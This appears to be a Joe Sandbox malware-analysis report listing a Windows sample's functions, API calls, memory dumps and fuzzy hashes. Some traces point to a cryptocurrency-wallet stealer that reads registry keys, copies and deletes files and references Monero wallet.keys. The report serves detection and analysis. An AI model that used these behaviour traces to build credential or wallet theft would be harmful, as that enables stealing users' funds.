                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 3a21276cd7f90df18236a5176aee02e197440fdc15b09b1dbb737c91b9fd0673
                  • Instruction ID: bfd24cd9047eed487d0f02e076a199b33010f1da8c8f20c005a397bbf214f056
                  • Opcode Fuzzy Hash: 3a21276cd7f90df18236a5176aee02e197440fdc15b09b1dbb737c91b9fd0673
                  • Instruction Fuzzy Hash: 9F21C9B5D14209ABCF04EFE4D955AEEB7B9BF48300F04852AE506F3250EB745605CFA9
                  Function 00937E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00937E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,0104B7A0,00000000,00020119,?), ref: 00937E5E
                  • RegQueryValueExA.ADVAPI32(?,0105DC58,00000000,00000000,000000FF,000000FF), ref: 00937E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00937E92
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: ef5406816b39ec16972be18dc065391ef7a3c923aa961bb2bec79cbe1fe31897
                  • Instruction ID: f38bf3adaf3e63a7fb529d791b351650bd0a8752852454138187ae5a37f4049a
                  • Opcode Fuzzy Hash: ef5406816b39ec16972be18dc065391ef7a3c923aa961bb2bec79cbe1fe31897
                  • Instruction Fuzzy Hash: 50113AB1A44205ABDB20CBD4DD49FBBBBB8EB44B10F104159F605A72D0DBB869008FA2
                  Function 00939260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(0105E018,?,?,?,0093140C,?,0105E018,00000000), ref: 0093926C
                  • lstrcpyn.KERNEL32(00B6AB88,0105E018,0105E018,?,0093140C,?,0105E018), ref: 00939290
                  • lstrlen.KERNEL32(?,?,0093140C,?,0105E018), ref: 009392A7
                  • wsprintfA.USER32 ref: 009392C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: f89f1a69e916c5b7308b1d2a229c011e614e631c666ae0c0edef7f5a1d346b70
                  • Instruction ID: 521ac179b40bd89931835aac9147176f71b2650b57ce874dea552c462c01cac2
                  • Opcode Fuzzy Hash: f89f1a69e916c5b7308b1d2a229c011e614e631c666ae0c0edef7f5a1d346b70
                  • Instruction Fuzzy Hash: BC01CC75500108FFCB04DFECC994EAE7BB9EB48354F148548F909AB244CA75AE40DF91
                  Function 009212A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009212B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009212BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009212D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009212F5
                  • RegCloseKey.ADVAPI32(?), ref: 009212FF
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 05b20f7e70f90828f204407a3af30867c58e98ae236b1579497d9cb85ae054c5
                  • Instruction ID: 02a36a9a8980f23137638453859db967fe6e5bda61b2bdcf3cc415377f3af5fe
                  • Opcode Fuzzy Hash: 05b20f7e70f90828f204407a3af30867c58e98ae236b1579497d9cb85ae054c5
                  • Instruction Fuzzy Hash: 9E01E6B5A40208BBDB14DFD4DC59FAEB7BCEB48701F108155FA15A72C0DAB5AA018F51
                  Function 00936630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00936663
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00936726
                  • ExitProcess.KERNEL32 ref: 00936755
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 0791ef7e8745713e66842698ac2caf31723498c6f6c75136431c2581fb51a16d
                  • Instruction ID: d317a476531e07c0681f0aaba46e35f3b5fe75c408789f46d305d322b6535935
                  • Opcode Fuzzy Hash: 0791ef7e8745713e66842698ac2caf31723498c6f6c75136431c2581fb51a16d
                  • Instruction Fuzzy Hash: 0E31FDB1801218AADB14EB50DC95BDE7778AF54300F404199F20A77191DF746B49CF5A
                  Function 009387C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00940E28,00000000,?), ref: 0093882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00938836
                  • wsprintfA.USER32 ref: 00938850
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: ffeb2c6ac86d6bd37112607f8ac9ab06a6cf139cb669c1f6fcc4657ac3a67608
                  • Instruction ID: eaceb1936da3f50bdd40d27aa3b0415d60cb9880c853e06d497a4ee98d076ca3
                  • Opcode Fuzzy Hash: ffeb2c6ac86d6bd37112607f8ac9ab06a6cf139cb669c1f6fcc4657ac3a67608
                  • Instruction Fuzzy Hash: 6521EAB1A45208ABDB04DF94DD49FAEBBB8FB48711F104119F605B72D0CBB9A9018FA1
                  Function 00938D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0093951E,00000000), ref: 00938D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00938D62
                  • wsprintfW.USER32 ref: 00938D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 8da0c0615ee3ccbbf9f4716a68baf97097880e4e24dbe80d5d79aa9a1ce3ef29
                  • Instruction ID: 45a93354c558ba52848d375c1b49b972f7ea5ae176ee99d9cb11b88e6b254ba7
                  • Opcode Fuzzy Hash: 8da0c0615ee3ccbbf9f4716a68baf97097880e4e24dbe80d5d79aa9a1ce3ef29
                  • Instruction Fuzzy Hash: 0AE0E675A50208BFDB10DB94DD09E6977B8EB84702F004154FD0A972C0DDB56E109F56
                  Function 0092A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,0105C720,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,01059110,?,\Monero\wallet.keys,00940E17), ref: 00938B86
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 0092A3FF
                  • lstrlen.KERNEL32(00000000), ref: 0092A6BC
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 0092A743
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 0004fb3a439ce0293bcc780a4f7cbead42795d16e82f909f6192d428b7f9ab55
                  • Instruction ID: ec78896cd738047381d24339b067ac5de29d41ad9d76eafc27c60ede0dcef8bb
                  • Opcode Fuzzy Hash: 0004fb3a439ce0293bcc780a4f7cbead42795d16e82f909f6192d428b7f9ab55
                  • Instruction Fuzzy Hash: D0E1BC72810118ABDB05FBA4DC92FEE7338AF94300F508169F557B60A1EF746A49CF66
                  Function 0092D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,0105C720,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,01059110,?,\Monero\wallet.keys,00940E17), ref: 00938B86
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092D481
                  • lstrlen.KERNEL32(00000000), ref: 0092D698
                  • lstrlen.KERNEL32(00000000), ref: 0092D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 0092D72B
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 5f5dae55a77400a6c690f20238af87ffba9193eeaba83dc7701559aae4da2452
                  • Instruction ID: c8c5d1aeb96c01272d5df8869f1ee0b0ed342983dcbf3a67e99e23b545aee232
                  • Opcode Fuzzy Hash: 5f5dae55a77400a6c690f20238af87ffba9193eeaba83dc7701559aae4da2452
                  • Instruction Fuzzy Hash: 0291FD72910108ABDB04FBA4DC96FEE7338AF94300F504168F547B60A1EF746A09CFA6
                  Function 0092D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,0105C720,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,01059110,?,\Monero\wallet.keys,00940E17), ref: 00938B86
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092D801
                  • lstrlen.KERNEL32(00000000), ref: 0092D99F
                  • lstrlen.KERNEL32(00000000), ref: 0092D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 0092DA32
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 9e5fb2c8ddd779ceb05b807c24167186f40ddef938ab2ca346923603b0dc9cd8
                  • Instruction ID: 7ef38f57fe106c0d335945aeeabcb221ee642265cdfe6355e27cba38d0cf9347
                  • Opcode Fuzzy Hash: 9e5fb2c8ddd779ceb05b807c24167186f40ddef938ab2ca346923603b0dc9cd8
                  • Instruction Fuzzy Hash: DC81EB72910108AACF04FBA4DC96FEE7339AF94300F504528F547B60A1EF746A09DFA6
